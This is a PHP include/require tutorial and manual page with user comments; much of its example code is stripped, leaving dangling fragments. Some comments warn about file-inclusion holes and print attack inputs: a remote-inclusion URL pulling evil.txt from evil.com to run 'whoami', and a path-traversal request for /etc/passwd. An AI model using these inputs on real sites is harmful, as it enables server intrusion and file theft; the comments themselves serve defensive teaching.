PHP Include Files
The include
[or require
] statement takes all the text/code/markup that exists in the specified file and copies it into the file that uses the include statement.
Including files is very useful when you want to include the same PHP, HTML, or text on multiple pages of a website.
PHP include and require Statements
It is possible to insert the content of one PHP file into another PHP file [before the server executes it], with the include or require statement.
The include and require statements are identical, except upon failure:
require
will produce a fatal error [E_COMPILE_ERROR] and stop the scriptinclude
will only produce a warning [E_WARNING] and the script will continue
So, if you want the execution to go on and show users the output, even if the include file is missing, use the include statement. Otherwise, in case of FrameWork, CMS, or a complex PHP application coding, always use the require statement to include a key file to the flow of execution. This will help avoid compromising your application's security and integrity, just in-case one key file is accidentally missing.
Including files saves a lot of work. This means that you can create a standard header, footer, or menu file for all your web pages. Then, when the header needs to be updated, you can only update the header include file.
Syntax
include 'filename';
or
require 'filename';
PHP include Examples
Example 1
Assume we have a standard footer file called "footer.php", that looks like this:
To include the footer file in a page, use the include
statement:
Example
Welcome to my home page!
Some text.
Some more text.
Run example »
Example 2
Assume we have a standard menu file called "menu.php":
All pages in the Web site should use this menu file. Here is how it can be done [we are using a
Example
Welcome to my home page!
Some text.
Some more text.
Run example »
Example 3
Assume we have a file called "vars.php", with some variables defined:
Then, if we include the "vars.php" file, the variables can be used in the calling file:
Example
Welcome to my home page!
Run example »
The require
statement is also used
to include a file into the PHP code.
However, there is one big difference between include and require; when a file is included with the include
statement and PHP cannot find it, the script will continue to execute:
Example
Welcome to my home page!
Run example »
If we do the same example using the require
statement, the echo statement will not be executed because the script execution dies after the require
statement returned a fatal error:
Example
Welcome to my home page!
Run example »
Use require
when the file is required by the application.
Use include
when the file is not required and application should continue when file is not found.
PHP Exercises
[PHP 4, PHP 5, PHP 7, PHP 8]
The include
expression includes and evaluates the specified file.
The documentation below also applies to require.
Files are included based on the file path given or, if none is given, the include_path specified.
If the file isn't found in the include_path, include
will finally check in the calling script's own directory and the current working directory before failing. The include
construct will emit an E_WARNING
if it cannot find a file; this is different behavior from require, which will emit an
E_ERROR
.
Note that both include
and require
raise additional E_WARNING
s, if the file cannot be accessed, before raising the final E_WARNING
or E_ERROR
, respectively.
If a path is defined — whether absolute [starting with a drive letter or \
on Windows, or /
on Unix/Linux systems] or relative to the current directory [starting with .
or ..
] — the
include_path will be ignored altogether. For example, if a filename begins with ../
, the parser will look in the parent directory to find the requested file.
For more information on how PHP handles including files and the include path, see the documentation for include_path.
When a file is included, the code it contains inherits the variable scope of the line on which the include occurs. Any variables available at that line in the calling file will be available within the called file, from that point forward. However, all functions and classes defined in the included file have the global scope.
Example #1 Basic include
example
vars.php
test.php
If the include occurs inside a function within the calling file, then all of the code contained in the called file will behave as though it had been defined inside that function. So, it will follow the variable scope of that function. An exception to this rule are magic constants which are evaluated by the parser before the include occurs.
Example #2 Including within functions
When a file is included, parsing drops out of PHP mode and into HTML mode at the beginning of the target file, and resumes again at the end. For this reason, any code inside the target file which should be executed as PHP code must be enclosed within valid PHP start and end tags.
If "URL include wrappers" are enabled in PHP, you can specify the file to be included using a URL [via HTTP or other supported wrapper - see Supported Protocols and Wrappers for a list of protocols] instead of a local pathname. If the target server interprets the target file as PHP code, variables may be passed to the included file using a URL request string as used with HTTP GET. This is not strictly speaking the same thing as including the file and having it inherit the parent file's variable scope; the script is actually being run on the remote server and the result is then being included into the local script.
Example #3 include
through HTTP
In order to automatically include files within scripts, see also the auto_prepend_file and auto_append_file configuration options in php.ini.
Note: Because this is a language construct and not a function, it cannot be called using variable functions, or named arguments.
See also require, require_once, include_once, get_included_files[], readfile[], virtual[], and include_path.
snowyurik at gmail dot com ¶
13 years ago
This might be useful:
So you can move script anywhere in web-project tree without changes.
Rash ¶
7 years ago
If you want to have include files, but do not want them to be accessible directly from the client side, please, please, for the love of keyboard, do not do this:
The reason you should not do this is because there is a better option available. Move the includeFile[s] out of the document root of your project. So if the document root of your project is at "/usr/share/nginx/html", keep the include files in "/usr/share/nginx/src".
Since user can't type 'your.site/../src/includeFile.php', your includeFile[s] would not be accessible to the user directly.
John Carty ¶
5 years ago
Before using php's include, require, include_once or require_once statements, you should learn more about Local File Inclusion [also known as LFI] and Remote File Inclusion [also known as RFI].
As example #3 points out, it is possible to include a php file from a remote server.
The LFI and RFI vulnerabilities occur when you use an input variable in the include statement without proper input validation. Suppose you have an example.php with code:
As a programmer, you might expect the user to browse to the path that you specify.
However, it opens up an RFI vulnerability. To exploit it as an attacker, I would first setup an evil text file with php code on my evil.com domain.
evil.txt
It is a text file so it would not be processed on my server but on the target/victim server. I would browse to:
h t t p : / / w w w .example.com/example.php?command=whoami& path= h t t p : / / w w w .evil.com/evil.txt%00
The example.php would download my evil.txt and process the operating system command that I passed in as the command variable. In this case, it is whoami. I ended the path variable with a %00, which is the null character. The original include statement in the example.php would ignore the rest of the line. It should tell me who the web server is running as.
Please use proper input validation if you use variables in an include statement.
Anon ¶
10 years ago
I cannot emphasize enough knowing the active working directory. Find it by: echo getcwd[];
Remember that if file A includes file B, and B includes file C; the include path in B should take into account that A, not B, is the active working directory.
error17191 at gmail dot com ¶
6 years ago
When including a file using its name directly without specifying we are talking about the current working directory, i.e. saying [include "file"] instead of [ include "./file"] . PHP will search first in the current working directory [given by getcwd[] ] , then next searches for it in the directory of the script being executed [given by __dir__].
This is an example to demonstrate the situation :
We have two directory structure :
-dir1
----script.php
----test
----dir1_test
-dir2
----test
----dir2_test
dir1/test contains the following text :
This is test in dir1
dir2/test contains the following text:
This is test in dir2
dir1_test contains the following text:
This is dir1_test
dir2_test contains the following text:
This is dir2_test
script.php contains the following code:
The output of executing script.php is :
Directory of the current calling script: C:\dev\www\php_experiments\working_directory\example2\dir1
Current working directory: C:\dev\www\php_experiments\working_directory\example2\dir1
including "test" ...
This is test in dir1
Changing current working directory to dir2
Directory of the current calling script: C:\dev\www\php_experiments\working_directory\example2\dir1
Current working directory: C:\dev\www\php_experiments\working_directory\example2\dir2
including "test" ...
This is test in dir2
including "dir2_test" ...
This is dir2_test
including "dir1_test" ...
This is dir1_test
including "./dir1_test" ...
couldn't include this file
Wade. ¶
13 years ago
If you're doing a lot of dynamic/computed includes [>100, say], then you may well want to know this performance comparison: if the target file doesn't exist, then an @include[] is *ten* *times* *slower* than prefixing it with a file_exists[] check. [This will be important if the file will only occasionally exist - e.g. a dev environment has it, but a prod one doesn't.]
Wade.
Rick Garcia ¶
14 years ago
As a rule of thumb, never include files using relative paths. To do this efficiently, you can define constants as follows:
----
----
and so on. This way, the files in your framework will only have to issue statements such as this:
This also frees you from having to check the include path each time you do an include.
If you're running scripts from below your main web directory, put a prepend.php file in each subdirectory:
--
--
This way, the prepend.php at the top always gets executed and you'll have no path handling headaches. Just remember to set the auto_prepend_file directive on your .htaccess files for each subdirectory where you have web-accessible scripts.
jbezorg at gmail dot com ¶
4 years ago
Ideally includes should be kept outside of the web root. That's not often possible though especially when distributing packaged applications where you don't know the server environment your application will be running in. In those cases I use the following as the first line.
[ __FILE__ != $_SERVER['SCRIPT_FILENAME'] ] or exit [ 'No' ];
Ray.Paseur often uses Gmail ¶
7 years ago
It's worth noting that PHP provides an OS-context aware constant called DIRECTORY_SEPARATOR. If you use that instead of slashes in your directory paths your scripts will be correct whether you use *NIX or [shudder] Windows. [In a semi-related way, there is a smart end-of-line character, PHP_EOL]
Example:
In IIS/Windows, the file is looked for at the root of the virtual host [we'll say C:\Server\Sites\MySite] since the path began with a forward slash. This behavior works in HTML under all platforms because browsers interpret the / as the root of the server.
However, Unix file/folder structuring is a little different. The / represents the root of the hard drive or current hard drive partition. In other words, it would basically be looking for root:/Path/To/File.php instead of serverRoot:/Path/To/File.php [which we'll say is /usr/var/www/htdocs]. Thusly, an error/warning would be thrown because the path doesn't exist in the root path.
I just thought I'd mention that. It will definitely save some trouble for those users who work under Windows and transport their applications to an Unix-based server.
Example:A work around would be something like:
Using this file, you can include files using the defined SERVER_DOC_ROOT constant and each file included that way will be included from the correct location and no errors/warnings will be thrown.
ayon at hyurl dot com ¶
5 years ago
It is also able to include or open a file from a zip file:
Note that instead of using / or \, open a file from a zip file uses # to separate zip name and inner file's name.
sPlayer ¶
11 years ago
Sometimes it will be usefull to include a string as a filename
joe dot naylor at gmail dot com ¶
11 years ago
Be very careful with including files based on user inputed data. For instance, consider this code sample:
index.php:
Then go to URL:
index.php?page=/../../../../../../etc/passwd%00.html
file_exists[] will return true, your passwd file will be included and since it's not php code it will be output directly to the browser.
Of course the same vulnerability exists if you are reading a file to display, as in a templating engine.
You absolutely have to sanitize any input string that will be used to access the filesystem, you can't count on an absolute path or appended file extension to secure it. Better yet, know exactly what options you can accept and accept only those options.
Chris Bell ¶
12 years ago
A word of warning about lazy HTTP includes - they can break your server.
If you are including a file from your own site, do not use a URL however easy or tempting that may be. If all of your PHP processes are tied up with the pages making the request, there are no processes available to serve the include. The original requests will sit there tying up all your resources and eventually time out.
Use file references wherever possible. This caused us a considerable amount of grief [Zend/IIS] before I tracked the problem down.
mbread at m-bread dot com ¶
15 years ago
If you have a problem with "Permission denied" errors [or other permissions problems] when including files, check:
1] That the file you are trying to include has the appropriate "r" [read] permission set, and
2] That all the directories that are ancestors of the included file, but not of the script including the file, have the appropriate "x" [execute/search] permission set.
durkboek A_T hotmail D_O_T com ¶
18 years ago
I would like to emphasize the danger of remote includes. For example:
Suppose, we have a server A with Linux and PHP 4.3.0 or greater installed which has the file index.php with the following code:
This is, of course, not a very good way to program, but i actually found a program doing this.
Then, we hava a server B, also Linux with PHP installed, that has the file list.php with the following code:
If index.php on Server A is called like this: //server_a/index.php?id=//server_b/list
then Server B will execute list.php and Server A will include the output of Server B, a list of files.
But here's the trick: if Server B doesn't have PHP installed, it returns the file list.php to Server A, and Server A executes that file. Now we have a file listing of Server A!
I tried this on three different servers, and it allways worked.
This is only an example, but there have been hacks uploading files to servers etc.
So, allways be extremely carefull with remote includes.
example at user dot com ¶
14 years ago
Just about any file type can be 'included' or 'required'. By sending appropriate headers, like in the below example, the client would normally see the output in their browser as an image or other intended mime type.
You can also embed text in the output, like in the example below. But an image is still an image to the client's machine. The client must open the downloaded file as plain/text to see what you embedded.
'Including' any file made this way will execute those scripts. NEVER 'include' anything that you found on the web or that users upload or can alter in any way. Instead, use something a little safer to display the found file, like "echo file_get_contents['/some_image.jpg'];"
Which brings us to a major security issue. Scripts can be hidden within images or files using this method. For example, instead echoing "", a foreach/unlink loop through the entire filesystem, or some other method of disabling security on your machine.
abanarn at gmail dot com ¶
8 years ago
To Windows coders, if you are upgrading from 5.3 to 5.4 or even 5.5; if you have have coded a path in your require or include you will have to be careful. Your code might not be backward compatible. To be more specific; the code escape for ESC, which is "\e" was introduced in php 5.4.4 + but if you use 5.4.3 you should be fine. For instance:
Test script:
-------------
In php 5.3.* to php 5.4.3
----------------------------
If you use require["C:\element\scripts\include.php"] it will work fine.
If php 5.4.4 + It will break.
------------------------------
Warning: require[C:←lement\scripts\include.php]: failed to open stream: In
valid argument in C:\element\scripts\include.php on line 20
Fatal error: require[]: Failed opening required 'C:←lement\scripts\include.php
Solution:
-----------
Theoretically, you should be always using "\\" instead of "\" when you write php in windows machine OR use "/" like in Linux and you should fine since "\" is an escape character in most programming languages.
If you are not using absolute paths ; stream functions is your best friend like stream_resolve_include_path[] , but you need to include the path you are resolving in you php.ini [include_path variable].
I hope this makes sense and I hope it will someone sometime down the road.
cheers,
uramihsayibok, gmail, com ¶
14 years ago
I have a need to include a lot of files, all of which are contained in one directory. Support for things like would be nice, but it doesn't exist.
Therefore I wrote this quick function [located in a file automatically included by auto_prepend_file]:
A fairly obvious solution. It doesn't deal with relative file paths though; you still have to do that yourself.
Jero Minh ¶
7 years ago
Notice that using @include [instead of include without @] will set the local value of error_reporting to 0 inside the included script.
Consider the following:
foo.php
Output:
Own value before: 32767
include foo.php: 32767
@include foo.php: 0
Own value now: 32767
james at gogo dot co dot nz ¶
18 years ago
While you can return a value from an included file, and receive the value as you would expect, you do not seem to be able to return a reference in any way [except in array, references are always preserved in arrays].
FOO i.e the reference passed to x[] is broken on it's way out of the include[] Neither can you do something like as that's a parse error [include is not a real function, so can't take a reference in that case]. And you also can't do in the included file [parse error again, nothing to assign the reference too]. The only solutions are to set a variable with the reference which the including code can then return itself, or return an array with the reference inside. ---For example, we have two files, file 1.php contains...
and file 2.php contains...
calling 1.php will produce
FOO
James Sleeman
//www.gogo.co.nz/